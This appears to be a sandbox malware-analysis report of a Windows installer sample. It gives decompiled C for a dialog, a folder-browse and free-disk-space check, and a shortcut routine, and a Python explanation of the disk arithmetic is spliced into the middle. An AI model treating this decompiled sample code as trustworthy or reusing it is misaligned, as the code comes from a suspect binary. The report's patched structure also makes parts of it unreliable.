                                                                          							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                                          								_t283 = 0x20;
                                                                          							}
                                                                          							E00401299(_t283);
                                                                          							SendMessageA(_a4, 0x420, _t315, _t283);
                                                                          							_a12 = 1;
                                                                          							_a16 = _t315;
                                                                          							_a8 = 0x40f;
                                                                          							goto L56;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					 *0x7a2fe0 = _a4;
                                                                          					_t285 = 2;
                                                                          					_v28 = 0;
                                                                          					_v16 = _t285;
                                                                          					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
                                                                          					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
                                                                          					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
                                                                          					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                          					 *0x79f564 = _t252;
                                                                          					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                          					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
                                                                          					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                          						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                          					}
                                                                          					DeleteObject(_v24);
                                                                          					_t286 = 0;
                                                                          					do {
                                                                          						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                          						if(_t258 != _t315) {
                                                                          							if(_t286 != 0x20) {
                                                                          								_v16 = _t315;
                                                                          							}
                                                                          							_push(_t258);
                                                                          							_push(_t315);
                                                                          							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
                                                                          						}
                                                                          						_t286 = _t286 + 1;
                                                                          					} while (_t286 < 0x21);
                                                                          					_t317 = _a16;
                                                                          					_t287 = _v16;
                                                                          					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                          					_push(0x15);
                                                                          					E00403DA7(_a4);
                                                                          					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                          					_push(0x16);
                                                                          					E00403DA7(_a4);
                                                                          					_t318 = 0;
                                                                          					_t288 = 0;
                                                                          					if( *0x7a2fac <= 0) {
                                                                          						L19:
                                                                          						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                          						goto L20;
                                                                          					} else {
                                                                          						_t311 = _v32 + 8;
                                                                          						_v24 = _t311;
                                                                          						do {
                                                                          							_t268 = _t311 + 0x10;
                                                                          							if( *_t268 != 0) {
                                                                          								_v60 = _t268;
                                                                          								_t269 =  *_t311;
                                                                          								_t302 = 0x20;
                                                                          								_v84 = _t288;
                                                                          								_v80 = 0xffff0002;
                                                                          								_v76 = 0xd;
                                                                          								_v64 = _t302;
                                                                          								_v40 = _t318;
                                                                          								_v68 = _t269 & _t302;
                                                                          								if((_t269 & 0x00000002) == 0) {
                                                                          									if((_t269 & 0x00000004) == 0) {
                                                                          										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                          									} else {
                                                                          										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                          									}
                                                                          								} else {
                                                                          									_v76 = 0x4d;
                                                                          									_v44 = 1;
                                                                          									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                          									_v28 = 1;
                                                                          									 *( *0x79f578 + _t318 * 4) = _t274;
                                                                          									_t288 =  *( *0x79f578 + _t318 * 4);
                                                                          								}
                                                                          							}
                                                                          							_t318 = _t318 + 1;
                                                                          							_t311 = _v24 + 0x418;
                                                                          							_v24 = _t311;
                                                                          						} while (_t318 <  *0x7a2fac);
                                                                          						if(_v28 != 0) {
                                                                          							L20:
                                                                          							if(_v16 != 0) {
                                                                          								E00403DDC(_v8);
                                                                          								_t280 = _v32;
                                                                          								_t315 = 0;
                                                                          								goto L23;
                                                                          							} else {
                                                                          								ShowWindow(_v12, 5);
                                                                          								E00403DDC(_v12);
                                                                          								L89:
                                                                          								return E00403E0E(_a8, _a12, _a16);
                                                                          							}
                                                                          						}
                                                                          						goto L19;
                                                                          					}
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • GetDlgItem.USER32 ref: 004046BE
                                                                          • GetDlgItem.USER32 ref: 004046CB
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
                                                                          • LoadBitmapA.USER32 ref: 0040472A
                                                                          • SetWindowLongA.USER32 ref: 0040473D
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
                                                                          • DeleteObject.GDI32(?), ref: 0040479D
                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
                                                                          • GetWindowLongA.USER32 ref: 004048D7
                                                                          • SetWindowLongA.USER32 ref: 004048E5
                                                                          • ShowWindow.USER32(?,00000005), ref: 004048F6
                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
                                                                          • GlobalFree.KERNEL32 ref: 00404AE2
                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
                                                                          • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
                                                                          • ShowWindow.USER32(?,00000000), ref: 00404C78
                                                                          • GetDlgItem.USER32 ref: 00404C83
                                                                          • ShowWindow.USER32(00000000), ref: 00404C8A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                          • String ID: $M$N
                                                                          • API String ID: 1638840714-813528018
                                                                          • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                          • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
                                                                          • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                          • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 68%
                                                                          			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                          				int _v8;
                                                                          				signed int _v12;
                                                                          				long _v16;
                                                                          				long _v20;
                                                                          				char _v24;
                                                                          				long _v28;
                                                                          				char _v32;
                                                                          				intOrPtr _v36;
                                                                          				long _v40;
                                                                          				signed int _v44;
                                                                          				CHAR* _v52;
                                                                          				intOrPtr _v56;
                                                                          				intOrPtr _v60;
                                                                          				intOrPtr _v64;
                                                                          				CHAR* _v68;
                                                                          				void _v72;
                                                                          				char _v76;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				intOrPtr _t75;
                                                                          				signed char* _t80;
                                                                          				intOrPtr* _t81;
                                                                          				int _t86;
                                                                          				int _t88;
                                                                          				int _t100;
                                                                          				signed int _t105;
                                                                          				char* _t110;
                                                                          				intOrPtr _t114;
                                                                          				intOrPtr* _t128;
                                                                          				signed int _t140;
                                                                          				signed int _t145;
                                                                          				CHAR* _t151;
                                                                          
                                                                          				_t75 =  *0x79ed58;
                                                                          				_v36 = _t75;
                                                                          				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
                                                                          				_v12 =  *((intOrPtr*)(_t75 + 0x38));
                                                                          				if(_a8 == 0x40b) {
                                                                          					E004052A3(0x3fb, _t151);
                                                                          					E00405BFB(_t151);
                                                                          				}
                                                                          				if(_a8 != 0x110) {
                                                                          					L8:
                                                                          					if(_a8 != 0x111) {
                                                                          						L19:
                                                                          						if(_a8 == 0x40f) {
                                                                          							L21:
                                                                          							_v8 = _v8 & 0x00000000;
                                                                          							_v12 = _v12 & 0x00000000;
                                                                          							_t145 = _t144 | 0xffffffff;
                                                                          							E004052A3(0x3fb, _t151);
                                                                          							if(E004055AC(_t169, _t151) == 0) {
                                                                          								_v8 = 1;
                                                                          							}
                                                                          							E004059BF(0x79e550, _t151);
                                                                          							_t80 = E0040555F(0x79e550);
                                                                          							if(_t80 != 0) {
                                                                          								 *_t80 =  *_t80 & 0x00000000;
                                                                          							}
                                                                          							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
                                                                          							if(_t81 == 0) {
                                                                          								L28:
                                                                          								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
                                                                          								__eflags = _t86;
                                                                          								if(_t86 == 0) {
                                                                          									goto L31;
                                                                          								}
                                                                          								_t100 = _v20 * _v28;
                                                                          								__eflags = _t100;
                                                                          								_t145 = MulDiv(_t100, _v16, 0x400);
                                                                          								goto L30;
                                                                          							} else {
                                                                          								_push( &_v32);
                                                                          								_push( &_v24);
                                                                          								_push( &_v44);
                                                                          								_push(0x79e550);
                                                                          								if( *_t81() == 0) {
                                                                          									goto L28;
                                                                          								}
                                                                          								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                                                          								L30:
                                                                          								_v12 = 1;
                                                                          								L31:
                                                                          								if(_t145 < E004045FA(5)) {
                                                                          									_v8 = 2;
                                                                          								}
                                                                          								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
                                                                          									E00404545(0x3ff, 0xfffffffb, _t87);
                                                                          									if(_v12 == 0) {
                                                                          										SetDlgItemTextA(_a4, 0x400, 0x79e540);
                                                                          									} else {
                                                                          										E00404545(0x400, 0xfffffffc, _t145);
                                                                          									}
                                                                          								}
                                                                          								_t88 = _v8;
                                                                          								 *0x7a3024 = _t88;
                                                                          								if(_t88 == 0) {
                                                                          									_v8 = E00401410(7);
                                                                          								}
                                                                          								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
                                                                          									_v8 = 0;
                                                                          								}
                                                                          								E00403DC9(0 | _v8 == 0x00000000);
                                                                          								if(_v8 == 0 &&  *0x79f570 == 0) {
                                                                          									E0040417A();
                                                                          								}
                                                                          								 *0x79f570 = 0;
                                                                          								goto L45;
                                                                          							}
                                                                          						}
                                                                          						_t169 = _a8 - 0x405;
                                                                          						if(_a8 != 0x405) {
                                                                          							goto L45;
                                                                          						}
                                                                          						goto L21;
                                                                          					}
                                                                          					_t105 = _a12 & 0x0000ffff;
                                                                          					if(_t105 != 0x3fb) {
                                                                          						L12:
                                                                          						if(_t105 == 0x3e9) {
                                                                          							_t140 = 7;
                                                                          							memset( &_v72, 0, _t140 << 2);
                                                                          							_t144 = 0x79f580;
                                                                          							_v76 = _a4;
                                                                          							_v68 = 0x79f580;
                                                                          							_v56 = E004044DF;
                                                                          							_v52 = _t151;
                                                                          							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
                                                                          							_t110 =  &_v76;
                                                                          							_v60 = 0x41;
                                                                          							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
                                                                          							if(_t110 == 0) {
                                                                          								_a8 = 0x40f;
                                                                          							} else {
                                                                          								E0040521C(0, _t110);
                                                                          								E004054CC(_t151);
                                                                          								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
                                                                          								if(_t114 != 0) {
                                                                          									_push(_t114);
                                                                          									_push(0);
                                                                          									E004059E1(0x3fb, 0x79f580, _t151);
                                                                          									_t144 = 0x7a1f20;
                                                                          									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
                                                                          										lstrcatA(_t151, 0x7a1f20);
                                                                          									}
                                                                          								}
                                                                          								 *0x79f570 =  *0x79f570 + 1;
                                                                          								SetDlgItemTextA(_a4, 0x3fb, _t151);
                                                                          							}
                                                                          						}
                                                                          						goto L19;
                                                                          					}
                                                                          					if(_a12 >> 0x10 != 0x300) {
                                                                          						goto L45;
                                                                          					}
                                                                          					_a8 = 0x40f;
                                                                          					goto L12;
                                                                          				} else {
                                                                          					_t144 = GetDlgItem(_a4, 0x3fb);
                                                                          					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
                                                                          						E004054CC(_t151);
                                                                          					}
                                                                          					 *0x7a2758 = _a4;
                                                                          					SetWindowTextA(_t144, _t151);
                                                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                          					_push(1);
                                                                          					E00403DA7(_a4);
                                                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                          					_push(0x14);
                                                                          					E00403DA7(_a4);
                                                                          					E00403DDC(_t144);
                                                                          					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
                                                                          					if(_t128 == 0) {
                                                                          						L45:
                                                                          						return E00403E0E(_a8, _a12, _a16);
                                                                          					}
                                                                          					 *_t128(_t144, 1);
                                                                          					goto L8;
                                                                          				}
                                                                          			}
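The decompiled dialog procedure E004041E5 resolves GetDiskFreeSpaceExA from KERNEL32.dll at run time and, when that fails, falls back to GetDiskFreeSpaceA; both branches reduce the answer to free kilobytes before comparing it against a value returned by E004045FA(5). The Python below is an added illustration written for this report, not the sample's own code: it re-expresses the two branches so their results can be checked. It assumes the documented Win32 layouts (ULARGE_INTEGER as low/high DWORDs, the GetDiskFreeSpaceA out-parameter order, MulDiv's 64-bit intermediate and -1 failure value) and that the signed type the decompiler gives _t145 reflects a signed comparison; all input values are constructed.

```python
"""Added illustration of the free-space arithmetic in E004041E5.
Not the sample's code; Win32 layouts follow the documented signatures
and every input value below is constructed for the example."""

MASK32 = 0xFFFFFFFF
INT32_MAX = 0x7FFFFFFF


def free_kb_from_ex(free_low: int, free_high: int) -> int:
    """Branch taken when GetDiskFreeSpaceExA resolves:
    _t145 = (_v40 << 32 | _v44) >> 10, with _v44/_v40 being the low/high
    DWORDs of the FreeBytesAvailable ULARGE_INTEGER. Result is free KiB."""
    free_bytes = ((free_high & MASK32) << 32) | (free_low & MASK32)
    return free_bytes >> 10


def muldiv(number: int, numerator: int, denominator: int) -> int:
    """Win32 MulDiv for non-negative operands: 64-bit intermediate product,
    quotient rounded to nearest, -1 when the denominator is zero or the
    result does not fit a signed 32-bit int (assumed from the API docs)."""
    if denominator == 0:
        return -1
    result = (number * numerator + denominator // 2) // denominator
    return result if result <= INT32_MAX else -1


def free_kb_from_legacy(sectors_per_cluster: int, bytes_per_sector: int,
                        free_clusters: int) -> int:
    """Fallback branch (label L28 in the listing) when the Ex import is
    missing: _t100 = _v20 * _v28; _t145 = MulDiv(_t100, _v16, 0x400).
    Returns free KiB, or -1 once the quotient exceeds INT32_MAX."""
    return muldiv(sectors_per_cluster * bytes_per_sector, free_clusters, 0x400)


def space_status(free_kb: int, required_kb: int) -> int:
    """Mirrors `if (_t145 < E004045FA(5)) _v8 = 2;`. _t145 starts at -1 and
    is typed signed in the decompile, so a failed or overflowed query (-1)
    also yields status 2 (insufficient space) rather than 0 (ok)."""
    return 2 if free_kb < required_kb else 0


if __name__ == "__main__":
    # Constructed inputs: 4 GiB free via the Ex path, 4000 KiB via the
    # legacy path, then the legacy path on a volume too large for MulDiv.
    print(free_kb_from_ex(0x00000000, 0x00000001))          # 4194304
    print(free_kb_from_legacy(8, 512, 1000))                # 4000
    print(free_kb_from_legacy(8, 512, 0x7FFFFFFF))          # -1
    print(space_status(free_kb_from_legacy(8, 512, 1000), 5000))  # 2
```

The two branches are not equivalent at the edges: the Ex branch carries a full 64-bit byte count, while the legacy branch is bounded by MulDiv's 32-bit result, so on a very large volume the fallback returns -1 and the signed comparison reports the disk as too small even though space is plentiful. When triaging a listing like this one, that asymmetry is the quickest tell that the free-space check is ordinary installer plumbing rather than payload logic.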
                                                                          0x004042fc
                                                                          0x00404303
                                                                          0x0040430b
                                                                          0x0040430e
                                                                          0x00404312
                                                                          0x00404319
                                                                          0x00404321
                                                                          0x00404370
                                                                          0x00404323
                                                                          0x00404324
                                                                          0x0040432a
                                                                          0x00404334
                                                                          0x0040433c
                                                                          0x0040433e
                                                                          0x0040433f
                                                                          0x00404341
                                                                          0x00404347
                                                                          0x00404355
                                                                          0x00404359
                                                                          0x00404359
                                                                          0x00404355
                                                                          0x0040435e
                                                                          0x00404369
                                                                          0x00404369
                                                                          0x00404321
                                                                          0x00000000
                                                                          0x004042d6
                                                                          0x004042c4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004042ca
                                                                          0x00000000
                                                                          0x0040422c
                                                                          0x00404237
                                                                          0x00404240
                                                                          0x0040424d
                                                                          0x0040424d
                                                                          0x00404257
                                                                          0x0040425c
                                                                          0x00404265
                                                                          0x00404268
                                                                          0x0040426d
                                                                          0x00404275
                                                                          0x00404278
                                                                          0x0040427d
                                                                          0x00404283
                                                                          0x00404292
                                                                          0x00404299
                                                                          0x004044ca
                                                                          0x004044dc
                                                                          0x004044dc
                                                                          0x004042a2
                                                                          0x00000000
                                                                          0x004042a2

                                                                          APIs
                                                                          • GetDlgItem.USER32 ref: 00404230
                                                                          • SetWindowTextA.USER32(00000000,?), ref: 0040425C
                                                                          • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
                                                                          • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
                                                                          • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
                                                                          • SetDlgItemTextA.USER32 ref: 00404369
                                                                            • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
                                                                            • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                            • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                            • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                            • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                          • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
                                                                          • SetDlgItemTextA.USER32 ref: 0040447E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                                                          • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
                                                                          • API String ID: 2007447535-1909522251
                                                                          • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                          • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
                                                                          • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                          • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 74%
                                                                          			E004020A6(void* __eflags) {
                                                                          				void* _t44;
                                                                          				intOrPtr* _t48;
                                                                          				intOrPtr* _t50;
                                                                          				intOrPtr* _t52;
                                                                          				intOrPtr* _t54;
                                                                          				signed int _t58;
                                                                          				intOrPtr* _t59;
                                                                          				intOrPtr* _t62;
                                                                          				intOrPtr* _t64;
                                                                          				intOrPtr* _t66;
                                                                          				intOrPtr* _t69;
                                                                          				intOrPtr* _t71;
                                                                          				int _t75;
                                                                          				signed int _t81;
                                                                          				intOrPtr* _t88;
                                                                          				void* _t95;
                                                                          				void* _t96;
                                                                          				void* _t100;
                                                                          
                                                                          				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
                                                                          				_t96 = E00402A9A(0xffffffdf);
                                                                          				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
                                                                          				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
                                                                          				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
                                                                          				if(E00405538(_t96) == 0) {
                                                                          					E00402A9A(0x21);
                                                                          				}
                                                                          				_t44 = _t100 + 8;
                                                                          				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
                                                                          				if(_t44 < _t75) {
                                                                          					L12:
                                                                          					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                          					_push(0xfffffff0);
                                                                          				} else {
                                                                          					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                          					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
                                                                          					if(_t95 >= _t75) {
                                                                          						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                          						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                          						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                          						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                                                                          						_t81 =  *(_t100 - 0x14);
                                                                          						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                          						if(_t58 != 0) {
                                                                          							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                          							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                          							_t81 =  *(_t100 - 0x14);
                                                                          						}
                                                                          						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                          						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                          						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
                                                                          							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                          							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
                                                                          						}
                                                                          						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                          						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                                                          						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                          						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                                                          						if(_t95 >= _t75) {
                                                                          							 *0x409418 = _t75;
                                                                          							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
                                                                          							_t69 =  *((intOrPtr*)(_t100 - 8));
                                                                          							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
                                                                          						}
                                                                          						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                                          						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                          					}
                                                                          					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                          					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                          					if(_t95 >= _t75) {
                                                                          						_push(0xfffffff4);
                                                                          					} else {
                                                                          						goto L12;
                                                                          					}
                                                                          				}
                                                                          				E00401428();
                                                                          				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
                                                                          				return 0;
                                                                          			}

                                                                          [Address column only, 0x004020af to 0x0040293e, for function E004020A6: the code lines these addresses annotated did not survive extraction]

                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                          • API String ID: 123533781-501415292
                                                                          • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                          • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
                                                                          • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                          • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 39%
                                                                          			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
                                                                          				void* _t19;
                                                                          
                                                                          				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
                                                                          					E0040591D(__edi, _t6);
                                                                          					_push(_t19 - 0x178);
                                                                          					_push(__esi);
                                                                          					E004059BF();
                                                                          				} else {
                                                                          					 *((char*)(__edi)) = __ebx;
                                                                          					 *__esi = __ebx;
                                                                          					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                          				}
                                                                          				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
